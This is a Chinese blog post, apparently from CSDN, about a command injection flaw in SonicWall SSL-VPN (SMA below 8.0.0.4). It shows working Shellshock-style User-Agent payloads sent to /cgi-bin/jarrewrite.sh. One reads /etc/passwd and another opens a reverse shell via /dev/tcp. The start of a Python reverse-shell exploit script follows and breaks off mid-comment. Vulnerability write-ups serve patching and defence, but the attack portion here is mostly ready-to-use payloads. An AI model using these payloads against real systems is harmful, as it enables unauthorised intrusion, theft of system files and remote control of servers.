SonicWall SSL-V**远程命令执行漏洞

SonicWall SSL-V**产品因Linux内核和HTTP CGI程序的漏洞,允许远程攻击者通过命令注入获取权限,可能导致服务器完全被接管。受影响的是Sonic SMA < 8.0.0.4版本。已知POC包括反弹shell的EXP脚本,利用方法涉及python EXP脚本和目标URL、监听IP、监听端口。
摘要由CSDN通过智能技术生成

漏洞详情

SonicWall SSL-V** 产品中使用了极为老旧的 Linux 内核和 HTTP CGI 可执行程序,该程序在处理 http 请求时,无法正确的解析 http header。该漏洞导致命令注入,远程攻击者通过注入命令可以轻松的获得nobody用户权限的控制权限。同时由于老旧内核的问题以及其中存在漏洞的可执行程序,攻击者可以轻易的提升权限并完全接管该服务器。

漏洞影响

Sonic SMA < 8.0.0.4

漏洞利用

POC:

GET /cgi-bin/jarrewrite.sh HTTP/1.1 

User-Agent: () { :; }; echo ; /bin/bash -c 'cat /etc/passwd'

image

反弹shell:

GET /cgi-bin/jarrewrite.sh HTTP/1.1 

User-Agent: () { :; }; echo ; /bin/bash -c "nohup bash -i >& /dev/tcp/ip/port 0>&1 &" 

反弹shell的EXP脚本:

#!/usr/bin/python
# coding: utf-8
# Author: Darren Martyn
# Credit: Phineas Fisher
# Notes:
# This exploit basically implements the exploits Phin
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值